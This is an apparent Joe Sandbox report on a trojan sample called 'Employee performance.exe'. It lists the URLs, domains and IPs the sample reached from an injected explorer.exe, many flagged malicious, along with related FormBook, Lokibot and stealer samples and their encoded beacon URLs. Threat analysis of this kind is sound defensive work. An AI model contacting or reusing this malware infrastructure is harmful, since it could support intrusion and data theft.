http://www.kovacsking.shop/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.k5h2o.top/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.webxwhiz.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rtpgacordewa288.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.malarosa.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.17eclbet.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hbvc.xyz	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.17eclbet.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sweatxin.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.warpateam.com/lm31/www.ladonbet.xyz	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.greate-electronics.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.greate-electronics.com/lm31/www.antoni-tapies.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.microsoft.	explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740167000.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073650707.000000000C510000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.delkhah-shop.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://powerpoint.office.com	explorer.exe, 00000003.00000002.3738755686.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1272534932.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.delkhah-shop.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.foreca.com	explorer.exe, 00000003.00000002.3733334301.00000000071A4000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.greate-electronics.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rtpgacordewa288.com/lm31/	explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.malarosa.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hbvc.xyz/lm31/www.sweatxin.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ladonbet.xyz	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ladonbet.xyz/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.k5h2o.top/lm31/www.rtpgacordewa288.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.webxwhiz.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.warpateam.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.greate-electronics.comReferer:	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sweatxin.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kovacsking.shop/lm31/www.delkhah-shop.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.warpateam.com	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.warpateam.com/lm31/	explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.224.212.213	www.warpateam.com	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	true
162.0.209.131	webxwhiz.com	Canada	35893	ACPCA	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
164.90.157.77	antoni-tapies.com	United States	14061	DIGITALOCEAN-ASNUS	true
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	true
47.242.64.82	y1.0pt8q-ic.ty3w.net	United States	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1488013
Start date and time:	2024-08-05 15:19:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Employee performance.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@74/4@11/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 46 Number of non-executed functions: 296
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:21:00	API Interceptor	6512350x Sleep call for process: explorer.exe modified
11:12:40	API Interceptor	5804763x Sleep call for process: control.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
103.224.212.213	8tvMmyxveyzFcnJ.exe	Get hash	malicious	FormBook	Browse	www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh
	tYEY1UeurGz0Mjb.exe	Get hash	malicious	FormBook	Browse	www.serco2020.com/dy13/?IR=7H41Cx9M/9Klm4wO2KyYkeGFvajkB7bQdwjfmZPzOjV6ZXjzQq6V6P6jcCKZla+kGSS1&nL=S4247TXPfxsLR
	yPURXYpFVuXra2o.exe	Get hash	malicious	FormBook	Browse	www.bolinkpass.club/cr12/?XDHHT=vl9/KZA8hSVZlZYYRwiRPHDwK+fMeRW7mLcdcO2HrZ8WCY+A9QkbN6YtC02r8Olco4RS&MZt0=njKl2H4htFXPs
	Ajanlatkeres_2024.05.29.PDF.exe	Get hash	malicious	FormBook, Lokibot	Browse	www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
	Solicitud de pedido Documento No 168646080.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
	DHL Factura Electronica Pendiente documento No 04BB25083.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	searchseedphase.online/bot/regex
	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
	2024-09C33T37.exe	Get hash	malicious	FormBook	Browse	www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
162.0.209.131	newfile42.xlsm	Get hash	malicious	BumbleBee	Browse
	newfile111.xlsm	Get hash	malicious	BumbleBee	Browse
	uk1108.xlsm	Get hash	malicious	BumbleBee	Browse
23.227.38.74	LFaMlxYlXkpv4GL.exe	Get hash	malicious	FormBook	Browse	www.kaidifeiniroo.net/ps15/?ETBT=7nW41XzH14mtMRW0&pRE=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKY7hL9Nd7+l
	CZyOWoN2hiszA6d.exe	Get hash	malicious	FormBook	Browse	www.go4stores.com/v15n/?Yn=TZ7dEV+dePhm1jul6DRI/086qPMy6e3XQqPVR8kv79G9dLkwb8ABVO+elO8aT8i2Z4Zj&mv=Y4QppplhSjwxWBd
	bSecDbrnMO4yqnP.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.kaidifeiniroo.net/ps15/?Bh=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKYCtqROMrfi&DxoLiH=dbYdUphHwt44W
	MCS61094Y5OI8.exe	Get hash	malicious	FormBook	Browse	www.jihanshop.com/de94/
	JTM300724IU.vbe	Get hash	malicious	FormBook	Browse	www.herbatyorganics.com/de94/?jHi=G6458LirWIUZKPaSDbNjmBsF6Jj2Hj01hgC1zdopZszCrt3bVxyWbRXqPM8+oK1eghC9&xZ-=MZcxq
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.oliviasnowceramics.com/hfhf/?OX0x=jL0dir&6lBX5p6=H/1t5Iv1mS6qazNvC4GaDsDTbokcX84DH7AxnoN69apBAJZ/+anivlDzVEyCaSCvjfTA
	xU0wdBC6XWRZ6UY.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.kaidifeiniroo.net/ps15/?XtutFHLx=BR5e+vAYPKSU8wYOTLy7wpzRN5ByJvme3fpAhHNJMoSEpLzyyPH2rOLUFKU7hL9ObtDz64d8cw==&_jATs=UfdXThPpQ4ST0
	FSW510972H6P0.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.sewassist.com/de94/
	gUJak0onLk.elf	Get hash	malicious	Unknown	Browse	shop.bikehireoldghostroad.com/
	S04307164.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.wergol.com/hy08/?kBZhq=76ARE7XQpOejeJ4AXgyv9+sF91x02cjLA3TRMrZhHEY9TEByi8vF89DJ/f4r0wEyMxd7&1bY=GtxhAHB

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
parkingpage.namecheap.com	PR44238-43433.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	#U0417#U0410#U041f#U0420#U041e#U0421.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	#U0417#U0410#U041f#U0420#U041e#U0421.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	#U041e#U041f#U0418#U0421#U0410#U041d#U0418#U0415.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	#U0417#U0410#U041a#U0410#U0417 #U041d#U0410 #U041f#U041e#U041a#U0423#U041f#U041a#U0423.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	Wquyc7Qwqh.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	bSecDbrnMO4yqnP.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
	http://boovefunding.today	Get hash	malicious	Unknown	Browse	91.195.240.19
	r777528623004-FedEx-Shipping-Label.exe	Get hash	malicious	FormBook	Browse	91.195.240.19
	RFQ31072024_August order_pdf.bat.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	91.195.240.19
shops.myshopify.com	http://johnlevis.com	Get hash	malicious	Unknown	Browse	23.227.38.74
	LFaMlxYlXkpv4GL.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	CZyOWoN2hiszA6d.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	bSecDbrnMO4yqnP.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	Dekont.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	MCS61094Y5OI8.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	https://www.seattlecoffeegear.com/83175735603/invoices/6a4c36fd259f82bfda53845d55e67b9d	Get hash	malicious	Unknown	Browse	23.227.38.74
	JTM300724IU.vbe	Get hash	malicious	FormBook	Browse	23.227.38.74
	LisectAVT_2403002B_448.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	.exe	Get hash	malicious	Unknown	Browse	161.35.84.83
	https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0	Get hash	malicious	Phisher	Browse	167.71.30.39
	botx.mips.elf	Get hash	malicious	Mirai	Browse	45.55.146.99
	DHL SHIPMENT NOTIFICATION.exe	Get hash	malicious	Lokibot	Browse	104.248.205.66
	BL& PACKINGLIST.xls	Get hash	malicious	Unknown	Browse	159.203.133.15
	BL& PACKINGLIST.xls	Get hash	malicious	Unknown	Browse	159.203.133.15
	http://pubgmobile.homes/	Get hash	malicious	Unknown	Browse	167.172.65.210
	Updater.lnk	Get hash	malicious	Unknown	Browse	95.85.16.212
	RcManager.bat	Get hash	malicious	Unknown	Browse	95.85.16.212
	SecuriteInfo.com.Program.Unwanted.5011.11652.31740.exe	Get hash	malicious	PureLog Stealer	Browse	165.227.176.158
